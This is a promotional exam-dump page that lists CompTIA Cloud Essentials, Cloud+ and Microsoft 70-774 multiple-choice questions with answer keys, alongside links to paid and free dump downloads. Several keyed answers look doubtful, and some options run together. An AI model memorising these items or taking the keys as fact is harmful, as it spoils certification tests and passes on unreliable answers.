D. When securing cloud resources, it is always a best practice to use the strongest security on the most
sensitive data.
Correct Answer: A

QUESTION 7
As part of a critical SaaS application, one of the contractual statements by the cloud provider is a
requirement to perform scheduled maintenance. This has a direct impact on which of the following?
A. Service strategy
B. Service transition
C. Service operation
D. Service design
Correct Answer: C

QUESTION 8
Which of the following is a benefit of cloud computing?
A. Cloud computing delivers IT capabilities that scale with demand.
B. Cloud computing delivers a wide range of services that are easily accessible to users
C. Cloud computing delivers IT capacity on demand.
D. Cloud computing negates the need for a procurement department.
Correct Answer: A

QUESTION 9
How can an organization successfully implement a PaaS strategy?
A. Open up internal databases with Web service access.
B. Take inventory of the application portfolio and select external suppliers
C. Standardize on a limited set of virtual machines.
D. Continuously execute performance analytics to monitor providers
Correct Answer: A

QUESTION 10
A company’s IT department currently spends several hours a day maintaining the hardware of the
database server. The company migrates the server to the cloud. Which of the following job responsibilities
of the IT department has been MOST impacted by this change?
A. Service Strategy
B. Service Operation
C. Service Design
D. Service Transition
Correct Answer: B

QUESTION 11
Which of the following roles can the IT department play in the selection process of cloud computing
providers?
A. Help understand and explain the application lifecycle
B. Help understand performance parametersC. Help understand provider quality
D. All of the above are correct
Correct Answer: D

QUESTION 12
Why does cloud computing shift capital cost to variable cost?
A. Cloud computing is more cost-efficient
B. IT assets are not owned by the customer
C. Servers are better utilized
D. Staff is no longer hired by the customer
Correct Answer: B

QUESTION 13
A private cloud is defined as:
A. a deployment model that uses an external cloud provider to provide host application servicesthat are
Internet accessible.
B. a deployment model that partners with other industry related companies to provide infrastructure
services.
C. a deployment model that uses virtualization technologies to provide infrastructure on demand within its
network.
D. a deployment model that uses an external cloud provider to provide host infrastructure services that
are Internet accessible.
Correct Answer: C

QUESTION 14
Which of the following is important to standardize?
A. Information standards and applications
B. User names and hardware providers
C. Virtual machine images and applications
D. Virtual machine images and identity information standards
Correct Answer: D

QUESTION 15
Which of the following are essential steps to take when creating a virtual server?
A. Select a machine image to run, select an application set to run, select security credentials.
B. Select a machine image to run, select an application set to run, select the size of the virtual machine.
C. Select a machine image to run, select security credentials, select the size of the virtual machine.
D. Select an application set to run, select security credentials, select the size of the virtual machine.
Correct Answer: C

QUESTION 16
A specific cloud deployment has been established specifically for financial services companies to
consume. Which of the following BEST describes this type of cloud environment?
A. Private cloud
B. Community cloud
C. Hybrid cloud
D. Public cloud
Correct Answer: B

QUESTION 17
An organization is in the process of selecting a SaaS provider to replace its current internal customer
relationship management system. The business expects better functionality than what is provided with the
internal system. Which of the following is the BEST reason for moving to a SaaS cloud service?
A. Understand who the most experienced IaaS cloud providers are so that a recommendation can be
made to the business based on what other industry vendors are doing.
B. Understand the current SLA’s of the cloud providers to ensure that they can exceed the current
expected business SLA’s.
C. Understand current functional and non-functional requirements of the system in order to ensure the
new system can meet and provide value add to current business needs.
D. Understand the cost model of the hosted infrastructure and whether the current system can be hosted
on cloud provided infrastructure.
Correct Answer: C

QUESTION 18
In which of the following ways do IT outsourcing and cloud computing differ?
A. Cloud computing services are typically much more scalable.
B. Cloud computing is much cheaper.
C. Hardware and software assets are typically customizable.
D. IT outsourcing promotes innovation.
Correct Answer: A

QUESTION 19
Since the implementation of a cloud infrastructure, a senior level network administrator’s job description
has changed from being responsible for maintaining the hardware of the network infrastructure to more of
a management position, ensuring the cloud vendor is providing the services specified in the contract with
the company. Which of the following has been impacted the MOST by the change in job responsibility?
A. Service Transition
B. Service Design
C. Service Operation
D. Service Strategy
Correct Answer: B

QUESTION 20
Which of the following risks occurs when a cloud provider stops serving the company?
A. Continuity risk
B. Financial risk
C. Legal risk
D. Confidentiality risk
Correct Answer: A

QUESTION 21
When using SaaS, the cloud computing vendor is responsible to maintain which of the following?
A. Client infrastructure
B. Client firewall
C. Updates and licenses
D. Workstation OS version
Correct Answer: C

QUESTION 22
An organization is planning to host a number of its critical applications in the cloud. Which of the following
is the BEST way to gain a broad assurance of the cloud provider’s security posture?
A. A review that includes interviewing key security stakeholders and identifying the key controls that they
operate
B. A review that includes security policies, evidence of the controls, physical site assessment and
vulnerability scanning
C. A review that includes the right to audit on a yearly basis and review of the security clauses on the
contract
D. A review that includes security applications, external audits, intrusion detection and firewall policy
reviews
Correct Answer: D

QUESTION 23
Cloud computing relies heavily on which of the following virtualization characteristics? (Select two.)
A. User federation
B. Hardware independence
C. Simplistic setup
D. Scalable resources
E. Information sharing
Correct Answer: BD

QUESTION 24
In order to maintain strategic flexibility and the ability to bring a cloud system back internally, which of the
following is the MOST important requirement in the contract?
A. Yearly independent audit is performed to measure performance
B. Cloud provider has ability to terminate contract
C. One week timeframe for termination of service
D. Cloud subscriber maintains ownership of their data
Correct Answer: D

QUESTION 25
Which of the following actions should a company take if a cloud computing provider ceases to uphold their
contract?
A. Consult the company’s exit plan.
B. Move the company data to the backup provider that was selected earlier.
C. Re-host all critical applications on the company’s internal servers.
D. Evaluate the company’s strategic options for an alternative provider
Correct Answer: A

QUESTION 26
Which of the following is the BEST example of a cloud vendor’s monthly hosting fee changing based on
cost allocations?
A. The company’s fee varies based on the projected quarterly revenue of the client’s company.
B. The company’s fee varies based on the number of their IT staff required to support the infrastructure.
C. The company’s fee varies based on the number of servers needed to house data in the datacenter.D. The company’s fee varies based on the energy consumption of each server in the datacenter.
Correct Answer: C

QUESTION 27
Which of the following cloud computing risks is compliance related?
A. Access rights that are handled by a cloud provider
B. Capacity management that is handled by a cloud provider
C. Cross-charging policies that are handled by both clients
D. Provider reputation
Correct Answer: A

QUESTION 28
A company is implementing a system replacement which has application components that are internally
hosted and multiple application components that are hosted as software as a service by different cloud
providers. Which of the following represents the challenge of this architecture?
A. Complexity
B. Time to market
C. Cost saving
D. Elasticity
Correct Answer: A

QUESTION 29
Which of the following is an important factor for maintaining strategic flexibility?
A. Return on investment
B. Integrity
C. Elasticity
D. Vendor lock-in
Correct Answer: D

QUESTION 30
Which of the following should be measured with a direct cost chargeback method?
A. Power and cooling consumed
B. CPU cycles used
C. Technical staff
D. Square footage cost of the facility
Correct Answer: C

QUESTION 31
Which of the following is the MOST complex security provisioning problem in a cloud environment?
A. Handling credit cards for purchasing cloud services
B. Keeping track of cloud provider performance
C. Managing users and their rights across multiple providers
D. Software assets that are introduced and can expire
Correct Answer: C

QUESTION 32
A business has recently implemented a hybrid cloud federated solution, which will allow if to rapidly anddynamically allocate resources during high demand, and quickly implement its Disaster Recovery Plan
(DRP) and Continuity of Operations (COOP). Given this implementation, the IT director is MOST likely
concerned about:
A. maintaining strategic flexibility.
B. reducing OPEX allocations.
C. hiring additional IT staff.
D. eliminating security risks
Correct Answer: D

QUESTION 33
A cloud subscriber may come under certain security constraints when hosting sensitive data in the cloud
due to government regulations. Which of the following is the BEST mitigating control that could be
implemented by the cloud provider?
A. Offer multi-tenancy software as a service with segregated physical infrastructure.
B. Offer a single-tenancy software service with segregated virtualized infrastructure.
C. Offer multi-tenancy software as a service with logically segregated infrastructure.
D. Offer a single-tenancy software service with monitored intrusion detection systems.
Correct Answer: B

QUESTION 34
Which of the following is a benefit of implementing cloud computing via the ITIL guideline?
A. Increased costs
B. Larger knowledge base
C. Increased free hard drive space
D. Improved service level
Correct Answer: D

QUESTION 35
Which of the following is included in a compliance audit?
A. Analyzing chargeback agreements
B. Analyzing cloud provider Service Level Agreements (SLAs)
C. Analyzing identity management and access controls
D. Analyzing the provider release calendar
Correct Answer: C

QUESTION 36
Which of the following BEST describes the properly of cloud computing that allows changes in transaction
volume without major changes to the system?
A. Scalability
B. Reliability
C. Integrity
D. Availability
Correct Answer: A

QUESTION 37
A private cloud generally has which of the following characteristics?
A. Services are restricted to members of the same organizationB. Infrastructure is managed by an independent service provider
C. Services are managed by a third-party provider
D. Services are accessed by members outside of the organization
Correct Answer: A

QUESTION 38
Amazon Elastic Cloud Computing (EC2) is a facility for quickly providing virtual servers.
This is an example of:
A. SaaS
B. IaaS
C. PaaS
D. QoS.
Correct Answer: B

QUESTION 39
Which of the following is an example of SaaS?
A. Offshore help desk support
B. Hosted database software and development tools
C. Hosted email software
D. Hosted network hardware
Correct Answer: C

Conclusion:

Thank you for reading! vcekey.com will insist on doing free content to help more friends who need free content.
If you are ready to obtain a certificate, select: https://www.pass4itsure.com/CLO-001.html VCE exam dump or PDF exam dumps.
We guarantee your easy passage.
(Exam databases are regularly updated throughout the year to include the latest questions and answers from the CompTIA CLO-001 exam)

[PDF] Free CompTIA Cloud Essentials CLO-001 dumps download from Google Drive:
https://drive.google.com/open?id=1Xa1_SjwXyfqPmZBt5wdHqJ5qRfFtojGt

[PDF] Free Full CompTIA dumps download from Google Drive:
https://drive.google.com/open?id=1SnVb1WLCtG5umIgtJ4zeNNSpuAFWZ3yg

Pass4itsure Promo Code 15% Off

pass4itsure CLO-001 coupon

related: https://www.vcekey.com/best-quality-cisco-ccnp-data-center-300-170-dumps/

CompTIA Cloud Essentials cv0-001 exam dumps, real and effective cv0-001 practice test

vcekey shares the latest effective CompTIA Cloud Essentials CV0-001 exam questions and answers, all of our free content from pass4itsure
experts, our experts are trustworthy, all exam content follows realistic exam questions and answers, These questions and
answers are updated frequently to ensure that you pass the CV0-001 exam at once. If you want to get the certificate easily
please select: https://www.pass4itsure.com/CV0-001.html VCE exam dumps or PDF exam Dumps. If you are only interested in
online knowledge, please pay attention to vcekey.com. We will insist on updating free content

[PDF] Free CompTIA Cloud Essentials CV0-001 dumps download from Google Drive:
https://drive.google.com/open?id=1YzkEkXqTqES99M5UTQIv6MoRAidsWMmO

[PDF] Free Full CompTIA dumps download from Google Drive:
https://drive.google.com/open?id=1SnVb1WLCtG5umIgtJ4zeNNSpuAFWZ3yg

Cloud+ (Plus) Certification | CompTIA IT Certifications:
https://certification.comptia.org/certifications/cloud

About the CV0-001 exam:

CompTIA Cloud+ validates the skills you need to maintain and optimize cloud infrastructure services.

Cloud+ covers the increased diversity of knowledge, skills and abilities required of system administrators to validate what is necessary
to perform effectively in data center jobs.
CompTIA Cloud+ views cloud-based infrastructure services as an increasingly important piece of an organization’s IT systems.
It is the only vendor-neutral, performance-based certification covering more than a specific vendor or a single function like security or
networking to help you better realize the return on investment of cloud infrastructure services.

Pass4itsure offers the latest CompTIA Cloud Essentials CV0-001 practice test free of charge (48Q&As)

QUESTION 1
An administrator is tasked to reduce the company’s datacenter power utilization. Currently there are 500
physical servers in the datacenter and 600 virtual servers with five additional available host servers. Which
of the following should the administrator perform?
A. Migrate servers using V2V technology
B. Perform an offline migration of virtual servers
C. Migrate servers using V2P technology
D. Migrate servers using P2V technology
Correct Answer: D

QUESTION 2
An administrator is tasked with installing an application patch on a virtual server. The administrator needs
the ability to restore the server to its previous state quickly if the patch corrupts the system. Which of the
following should the administrator do to accomplish this task?
A. Install the patch on a development server
B. Create a full backup
C. Create a snapshot
D. Install the patch on a test server
Correct Answer: C

QUESTION 3
Which of the following cloud delivery models presents the LEAST vulnerabilities to a company’s existing
network?
A. Hybrid
B. Community
C. Public
D. Private
Correct Answer: D

QUESTION 4
Which of the following uses the business model of shared resources in a cloud environment?
A. Elasticity
B. Self-serve
C. Cloud bursting
D. Multi-tenancy
Correct Answer: D

QUESTION 5
Which of the following is used to locate a specific area of storage in a cloud environment?
A. Object ID
B. SAN
C. Replicas
D. Metadata
Correct Answer: A

QUESTION 6
Which of the following can be done after an administrator deploys a virtual server to ensure that the server
vNIC can communicate to the physical network?
A. Bridge the vNIC
B. Set the vNIC speed to half-duplex
C. Add an addition vNIC
D. Set the vNIC speed to full-duplex
Correct Answer: A

QUESTION 7
After an administrator successfully migrated the last physical application server to a virtual environment,
the help desk reported slow performance. Which of the following should the administrator have done
FIRST before migrating this server?
A. Apply operating system patches to the application server after the migration.
B. Contact the vendor to see if the application is supported in a virtual environment.
C. Take a backup of the application server after the migration.
D. Migrate the application server in a test environment and have users test it.
Correct Answer: B

QUESTION 8
Which of the following would be used to establish a dedicated connection in a hybrid cloud environment?
A. CHAP
B. AES
C. PKI
D. VPN
Correct Answer: D

QUESTION 9
An administrator deployed a DaaS cloud delivery model for a financial institution and implemented a data
encryption technology using AES cryptography. Which of the following should the administrator implement
NEXT?
A. Access controls
B. RC5
C. SSL
D. Zoning
Correct Answer: A

QUESTION 10
An administrator deployed ten application servers from a single VM template. A senior administrator
notices that these ten VMs are not using their resources efficiently. Which of the following is MOST likely
the issue with the new servers?
A. The dynamic resource pool is malfunctioning.
B. The server is missing security patches.
C. The VM servers were not properly configured.
D. There are insufficient resources available on the host.
Correct Answer: C

QUESTION 11
Which of the following storage technologies is file-based?A. WAN
B. DAS
C. SAN
D. NAS
Correct Answer: D

QUESTION 12
Which of the following storage technologies can leverage switches in its implementation?
A. HBA
B. DAS
C. SCSI
D. SAN
Correct Answer: D

QUESTION 13
Which of the following RAID configuration would be used to accomplish disk mirroring with two disks?
A. RAID 0
B. RAID 1
C. RAID 5
D. RAID 10
Correct Answer: B

QUESTION 14
Which of the following only uses Fibre Channel to implement a storage infrastructure?
A. NFS
B. SAN
C. NAS
D. SMB
Correct Answer: B

QUESTION 15
Which of the following solutions primarily relies on private cloud resources but may use public cloud
resources based on capacity requirements?
A. Rapid deployment
B. Cloud bursting
C. Multi-tenancy
D. Pay-as-you-grow
Correct Answer: B

QUESTION 16
An employee is asked to run an instance of a Linux OS while booted up in a Windows OS. Which of the
following types of virtualization would be used to meet this requirement?
A. Type I
B. Type II
C. Bare Metal
D. NativeCorrect Answer: B

QUESTION 17
A small startup wins a contest giving them advertising time during a major sporting event. Which of the
following cloud characteristics should be in place to handle the possible spike in demand?
A. Shared disk space
B. Elasticity
C. Scalability
D. Shared memory
Correct Answer: B

QUESTION 18
Which of the following components should be virtualized and added to cloud infrastructure to ensure virtual
servers are only able to access the volumes assigned to them?
A. NAS
B. DAS
C. LUN
D. HBA
Correct Answer: D

QUESTION 19
Which of the following can be used to protect data integrity when information is being written to a SAN
from multiple clients?
A. Port Zoning
B. SAN Zoning
C. LUN Masking
D. Multipathing
Correct Answer: C

QUESTION 20
Several servers are connected to a SAN using three storage devices and FCoE for transmissions. These
servers only need to access one SAN device. All servers, the SAN, and the HBA are virtualized. Which of
the following should be used to ensure access is controlled appropriately between devices? (Select TWO).
A. LUN Masking
B. Hard Zoning
C. Supernetting
D. Soft Zoning
E. Subnetting
Correct Answer: AD

QUESTION 21
An administrator is called in to determine why a virtual desktop has been unable to connect to the
corporate network. Which of the following should be run to determine if the adapter is enabled? (Select
TWO).
A. ipconfig
B. netstat
C. ping
D. ifconfigE. iwconfig
Correct Answer: AD

QUESTION 22
Which of the following should be installed on VMs to report and take action against potential threats?
A. NIDS
B. HIPS
C. NIPS
D. HIDS
Correct Answer: B

QUESTION 23
Which of the following will explain why only some of the CPU cycles are available to a virtualized server
using two virtualized processors?
A. Extra processing is needed to store encryption keys used for secure transmission between the server
and the network.
B. Additional processing is used to run ports and services not turned off through the process of server
hardening.
C. Some processing is required for operational overhead on the processor and between the physical and
virtualized processors.
D. Significant processing is used to create and maintain the cache on multi-core processors.
Correct Answer: C

QUESTION 24
Which of the following would be used to prove the existence of vulnerabilities on a network?
A. Penetration testing
B. Vulnerability assessment
C. Business impact analysis
D. Risk assessment
Correct Answer: A

QUESTION 25
Which of the following is MOST likely to be retrieved from an individually addressable blob?
A. An object ID
B. A hash
C. A sequence number
D. An image
Correct Answer: D

QUESTION 26
Which of the following is true about a Type II hypervisor?
A. It requires a primary hypervisor to function properly.
B. It implements stronger security controls than a Type I supervisor at the same patch level.
C. It provides slower performance than a Type I hypervisor installed on the same hardware.
D. It provides direct hardware access through the use of specialized drivers.
Correct Answer: C

QUESTION 27
An enterprise hypervisor offers which of the following benefits over a workstation hypervisor?
A. Ability to create templates
B. Ability to provision more than 2 vCPUs
C. Snapshots
D. Live storage migration
Correct Answer: D

QUESTION 28
In order to enhance security on a SAN, which of the following should be configured?
A. ZFS
B. LUN
C. VSAN
D. Zoning
Correct Answer: D

QUESTION 29
An administrator has provisioned a LUN on a SAN and wants to be able to connect a VM to the new
storage using SCSI commands sent across the LAN. Which of the following should be configured on the
VM?
A. Virtual NIC
B. Virtual HBA
C. Virtual SAN
D. LUN masking
Correct Answer: A

QUESTION 30
A company has tasked an administrator with virtualizing the server farm and wants to adhere to the
principle of n+1. The administrator has analyzed the resource consumption of the current server farm and
observes the following:
5 application servers consuming 12 GB RAM each.
4 web servers consuming 2 GB RAM each.
10 terminal servers consuming 6 GB RAM each.
Which of the following is the MINIMUM necessary to meet the requirements of the new host cluster?
A. 1 host with 196GB RAM
B. 2 hosts with 64GB RAM each
C. 3 hosts with 128GB RAM each
D. 4 hosts with 24GB RAM each
Correct Answer: C

QUESTION 31
An administrator has installed a new NAS and is now attempting to optimize the servers for best
performance when communicating with the NAS. Modifying which of the following would MOST likely
enhance throughput?
A. Page file
B. Multipath I/O
C. N_Port settings
D. Jumbo frames
Correct Answer: D

QUESTION 32
Which of the following would provide the ability to perform transparent page sharing?
A. Type I hypervisor
B. Logical arrays
C. Type II hypervisor
D. Journal file system
Correct Answer: A

QUESTION 33
A system administrator has a server that has lost one of its connections to an adjacent server room. The
server can still be accessed remotely through its single network interface; however, it has lost access to
some of its drives. Which of the following is MOST likely correct?
A. The system has exceeded its disk latency threshold and has disabled its NIC.
B. The system has memory issues which are causing the OS to incorrectly define drives.
C. The system is having intermittent network issues.
D. The system is having an HBA failure or disconnection.
Correct Answer: D

QUESTION 34
Which of the following BEST describes a copy of data?
A. Access control
B. Replicas
C. Metadata
D. Extended metadata
Correct Answer: B

QUESTION 35
After receiving a report from the helpdesk that a database application is exhibiting degraded performance,
the storage administrator detected an issue. Which of the following is MOST likely the issue that was
discovered resulting in the degraded performance?
A. NIC failure
B. Power supply failure
C. Disk failure
D. HBA failure
Correct Answer: C

QUESTION 36
Which of the following is used to handle non-sensitive information in a datacenter and can be moved to the
public cloud to free up local resources and meet high demands?
A. Chargeback
B. Cloud bursting
C. Automation
D. Rapid deployment
Correct Answer: B

QUESTION 37
Which of the following is a type of hypervisor that runs on another operating system instead of running
directly on the host’s hardware?
A. Type II
B. Indirect access
C. Direct access
D. Type I
Correct Answer: A

QUESTION 38
One of the administrators of a cloud service provider has been asked to assist one of its newest customers
to deploy a multi-tier application (web, application, and database). The architecture design does not
specify where each service should reside and the customer is asking for a recommendation. Which of the
following should be recommended?
A. Application server should be placed in the DMZ
B. Database server should be placed in the DMZ
C. DMZ are only used for single-tier infrastructure
D. Web server should be placed in the DMZ
Correct Answer: D

QUESTION 39
An IT professional is considering the migration of an on-line store to the cloud due to high variation in
demand. Which of the following cloud characteristics is key?
A. Elasticity
B. Security
C. Scalability
D. Standardization
Correct Answer: A

QUESTION 40
A shipment company is looking to streamline some of their business activity. They are considering the
automation of a number of electronic services. The company handles confidential documents and
confidential data. Which of the following service options would the company choose?
A. Automated business process tools delivered by a public cloud provider
B. Community cloud
C. On-demand/self-service private cloud
D. On-demand/self-service public cloud
Correct Answer: C

QUESTION 41
In the process of streamlining the IT activity, a company has considered the delivery of a number of
services from a cloud. The best identified candidates were the newly acquired CRM and Help- Desk
platforms. Which of the following would be their choice considering the company offers a 24/7 help line/self
service portal to both their internal users and customers?
A. SaaS deployed on Public Cloud
B. PaaS deployed on Private Cloud
C. BPaaS deployed on a Hybrid Cloud
D. IaaS deployed on a Hybrid Cloud
Correct Answer: A

QUESTION 42
Which of the following would be used to mitigate the risk of an unauthorized party authenticating into the
network?
A. Install a software-based firewall
B. Establish a baseline and review logs daily
C. Install antivirus software
D. Disable the administrator account
Correct Answer: D

QUESTION 43
A company that provides Software as a Service wants to prevent the application code from being modified.
Which of the following techniques should be used to accomplish this task?
A. Obfuscation
B. Encryption
C. Auditing
D. Signing
Correct Answer: D

QUESTION 44
An administrator is planning to implement multipathing for iSCSI-connected storage. Which of the following
is required for this configuration?
A. Multiple gateways configured on the subnet
B. At least one HBA on the server
C. Multiple HBAs on the server
D. Multiple IP addresses on the storage device
Correct Answer: D

QUESTION 45
Which of the following is a disk interface type that has the BEST performance?
A. NAS
B. SAN
C. SAS
D. SSD
Correct Answer: C

QUESTION 46
Which of the following can be used to enable additional network interfaces on a router?
A. SNMP
B. WMI
C. Syslog
D. SMTP
Correct Answer: A

QUESTION 47
The Chief Information Officer (CIO) is selecting a hardware network solution that will optimize the WAN
between company locations in North America and Europe. Which of the following can be changed by third-
party hardware?A. IP latency
B. TCP flow control
C. Ethernet bandwidth
D. UDP latency
Correct Answer: B

QUESTION 48
A number of virtual servers suddenly crash, but the physical host is accessible and performing within the
baseline. Which of the following should be done to troubleshoot the issue?
A. Review the dump files on the physical host to determine the reason(s) for the failure.
B. Check the SAN configuration and ensure storage is available.
C. Change from thin to thick-provisioned virtual disks for the virtual machines.
D. Re-enable the physical NIC on the affected hosts.
Correct Answer: B

Conclusion:

Thank you for reading! vcekey.com will insist on doing free content to help more friends who need free content.
If you are ready to obtain a certificate, select: https://www.pass4itsure.com/CV0-001.html VCE exam dump or PDF exam dumps.
We guarantee your easy passage.
(Exam databases are regularly updated throughout the year to include the latest questions and answers from the CompTIA CV0-001 exam)

[PDF] Free CompTIA Cloud Essentials CV0-001 dumps download from Google Drive:
https://drive.google.com/open?id=1YzkEkXqTqES99M5UTQIv6MoRAidsWMmO

[PDF] Free Full CompTIA dumps download from Google Drive:
https://drive.google.com/open?id=1SnVb1WLCtG5umIgtJ4zeNNSpuAFWZ3yg

Pass4itsure Promo Code 15% Off

pass4itsure CV0-001 coupon

related: https://www.vcekey.com/most-popular-cisco-300-165-dumps-dcii-exam/

[2018 Microsoft Dumps Video] 100% Pass Rate Microsoft 70-774 Dumps PDF Latest Azure Machine Learning 70-774 PDF Video Study (30+ Questions) 1-12

Pass4itsure provides you with the latest 70-774 test questions and Answers for Azure machine learning, Bot frameworks, and cognitive services, with the latest 70-774 sample questions validated by a Microsoft certified professional. Pass4itsure 70-774 Dump: Perform Cloud Data Science with Azure Machine Learning (beta) including all the necessary tools and information to help you through 70-774 MCP, MCSA, MCSE certification exams. Pass4itsure provides the latest executive cloud data science and Azure machine learning questions with https://www.pass4itsure.com/70-774.html dumps questions and VCE, Microsoft 70-774 testing was written by Microsoft Certified Professionals. This is the test provided by Microsoft for the Examiner. This exam is provided in English. Applicants with the IT field can apply for a 70-774 dump of the Microsoft certification test. Our executive Cloud Data science and Azure machine learning 70-774 dumps problem really helps you get good grades in MCSE 70-774 exams, just for the first time by trying to get 70-774 sample questions.

Do you provide free updates?
Since in these MCSE 70-774 dumps have 70-774 new problems with the verified solution. Although the goal of this adventure is to achieve an academic excellence in it, we have a vision but no expectations. Once there are some changes on 70-774 exam, we will update the study materials timely to make sure that our customer can download the latest edition. Free download pass4itsure 70-774 dumps exam questions demo to see more than 90,000 satisfied customers passing their exams at the first attempt, without any difficulty. The updates are provided free for 120 days.

[2018 Pass4itsure Microsoft 70-774 PDF Dumps Video From Google Drive]: https://drive.google.com/open?id=1wAbjr5lZ2FQaBOaGbw-SKtd28TUG_t5A

[2018 Pass4itsure Microsoft 70-775 PDF Dumps Video From Google Drive]: https://drive.google.com/open?id=1fRrhvIJ3y7sk1UdKdTpI-VHgqoKPf1zk

Following Microsoft 70-774 Dumps 37QAs Are All New Published By Pass4itsure (1-12)
QUESTION 1
You plan to use Azure Machine Learning to develop a predictive model. You plan to include an Execute Python Script module. What capability does the module provide?
A. Outputting a file to a network location.
B. Performing interactive debugging of a Python script.
C. Saving the results of a Python script run in a Machine Learning environment to a local file.
D. Visualizing univariate and multivariate summaries by using Python code.
70-774 exam Correct Answer: D

QUESTION 2
Note: This question is part of a series of questions that use the same scenario. For your convenience, the scenario is repeated in each question. Each question presents a different goal and answer choices, but the text of the scenario is exactly the same in each question in this series. A travel agency named Margie’s Travel sells airline tickets to customers in the United States. Margie’s Travel wants you to provide insights and predictions on flight delays. The agency is considering implementing a system that will communicate to its customers as the flight departure nears about possible delays due to weather conditions. The flight data contains the following attributes: The weather data contains the following attributes: AirportID, ReadingDate (YYYY/MM/DD HH), SkyConditionVisibility, WeatherType, WindSpeed, StationPressure, PressureChange, and HourlyPrecip. You have an untrained Azure Machine Learning model that you plan to train to predict flight delays.
You need to assess the variability of the dataset and the reliability of the predictions from the model. Which module should you use?
A. Cross-Validate Model
B. Evaluate Model
C. Tune Model Hyperparameters
D. Train Model
E. Score Model
Correct Answer: A

QUESTION 3
You have data about the following:
You need to predict whether a user will like a particular movie.
Which Matchbox recommender should you use?
A. Item Recommendation
B. Related Items
C. Rating Prediction
D. Related Users
70-774 dumps Correct Answer: C

QUESTION 4
Note: This question is part of a series of questions that use the same scenario. For your convenience, the scenario is repeated in each question. Each question presents a different goal and answer choices, but the text of the scenario is exactly the same in each question in this series. A travel agency named Margie’s Travel sells airline tickets to customers in the United States. Margie’s Travel wants you to provide insights and predictions on flight delays. The agency is considering implementing a system that will communicate to its customers as the flight departure nears about possible delays due to weather conditions. The flight data contains the following attributes: The weather data contains the following attributes: AirportID, ReadingDate (YYYY/MM/DD HH), SkyConditionVisibility, WeatherType, WindSpeed, StationPressure, PressureChange, and HourlyPrecip. You plan to predict flight delays that are 30 minutes or more. You need to build a training model that accurately fits the data. The solution must minimize over fitting and minimize data leakage. Which attribute should you remove?
A. OriginAirportID
B. DepDel
C. DepDel30
D. Carrier
E. DestAirportID
Correct Answer: C

QUESTION 5
Note: This question is part of a series of questions that present the same scenario. Each question in the series contains a unique solution that might meet the stated goals. Some question sets might have more than one correct solution, while others might not have a correct solution. After you answer a question in this sections, you will NOT be able to return to it. As a result, these questions will not appear in the review screen. You are working on an Azure Machine Learning experiment. You have the dataset configured as shown in the following table.
70-774 dumps
You need to ensure that you can compare the performance of the models and add annotations to the results. Solution: You connect the Score Model modules from each trained model as inputs for the Evaluate Model module, and use the Execute R Script module. Does this meet the goal?
A. Yes
B. No
70-774 pdf Correct Answer: B

QUESTION 6
Note: This question is part of a series of questions that use the same or similar answer choices. An answer choice may be correct for more than one question in the series. Each question is independent of the other questions in this series. Information and details provided in a question apply only to that question. You have a dataset that contains a column named Column1. Column1 is empty. You need to omit Column1 from the dataset. The solution must use a native module. Which module should you use?
A. Execute Python Script
B. Tune Model Hyperparameters
C. Normalize Data
D. Select Columns in Dataset
E. Import Data
F. Edit Metadata
G. Clip Values
H. Clean Missing Data
Correct Answer: D

QUESTION 7
You are building an Azure Machine Learning workflow by using Azure Machine Learning Studio. You create an Azure notebook that supports the Microsoft Cognitive Toolkit. You need to ensure that the stochastic gradient descent (SGD) configuration maximizes the samples per second and supports parallel modeling that is managed by a parameter server. Which SGD algorithm should you use?
A. DataParallelASGD
B. DataParallelSGD
C. ModelAveragingSGD
D. BlockMomentumSGD
70-774 vce Correct Answer: B

QUESTION 8
You have an Azure Machine Learning environment.
You are evaluating whether to use R code or Python.
Which three actions can you perform by using both R code and Python in the Machine Learning environment? Each correct answer presents a complete solution.
NOTE: Each correct selection is worth one point.
A. Preprocess, cleanse, and group data.
B. Score a training model.
C. Create visualizations.
D. Create an untrained model that can be used with the Train Model module.
E. Implement feature ranking.
Correct Answer: ABC

QUESTION 9
Note: This question is part of a series of questions that use the same or similar answer choices. An answer choice may be correct for more than one question in the series. Each question is independent of the other questions in this series. Information and details provided in a question apply only to that question. You need to remove rows that have an empty value in a specific column. The solution must use a native module. Which module should you use?
A. Execute Python Script
B. Tune Model Hyperparameters
C. Normalize Data
D. Select Columns in Dataset
E. Import Data
F. Edit Metadata
G. Clip Values
H. Clean Missing Data
70-774 exam Correct Answer: H

QUESTION 10
You are building an Azure Machine Learning experiment.
You need to transform 47 numeric columns into a set of 10 linearly uncorrelated features.
Which module should you add to the experiment?
A. Principal Component Analysis
B. K-Means Clustering
C. Normalize Data
D. Group Data into Bins
Correct Answer: A

QUESTION 11
You have a dataset that is missing values in a column named Column3. Column3 is correlated to two columns named Column4 and Column5. You need to improve the accuracy of the dataset, while minimizing data loss. What should you do?
A. Replace the missing values in Column3 by using probabilistic Principal Component Analysis (PCA).
B. Remove all of the rows that have the missing values in Column4 and Column5.
C. Replace the missing values in Column3 with a mean value.
D. Remove the rows that have the missing values in Column3.
70-774 dumps Correct Answer: A

QUESTION 12
HOTSPOT
You need to use R code in a Transact-SQL statement to merge the repeating values 1 through 6 with Col1 in a table. Which statement should you use? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point.
Hot Area:
70-774 dumps
Correct Answer:

Students can easily get good grades in Microsoft Azure Machine Learning, bot framework, cognitive services 70-774 testing through access to Azure machine learning, bot framework, cognitive services 70-774 dumps and 70-774 problems from Pass4itsure. It certainly made us a day. We have been looking forward to all the customers promise a good future, we never know one day we will say, “success guarantee” to everyone, it will become our sales stamping line, our motto. Using Azure computer for cloud Data Science learning test products with the best learning features for azure machine learning, Bot framework, cognitive Services 70-774 exams are ready for those who have been looking for 70-774 questions and answers with 70-774 PDF dumps and 70-774 VCE.

70-774 dumps

Microsoft 70-774 dumps (

Perform Cloud Data Science with Azure Machine Learning (beta)

) can help people maintain their livelihoods, which is the basis for quality education and professional certification in this highly competitive contemporary world. Pass4itsure allows students who want to succeed in the Microsoft 70-774 exams to easily complete 70-774 test dumps, dump trading offers you 70-774 dumps training materials with Azure machine learning, Bot framework, cognitive services 70-774 new issues, 70 -774 braindumps questions, 70-774 PDF dumps and 70-774 VCE these 70-774 practice tests help you get good grades in Azure machine learning, Bot framework, cognitive services 70-774 exams in the first attempt only. This is a Microsoft Azure machine learning, Bot framework, cognitive service technology. This exam is specialized with MCP, MCSA, MCSE certification exams. As many IT professionals know, the Microsoft Certification 70-774 exam can help you meet these aspirations.

pass4itsure 70-774 dumps

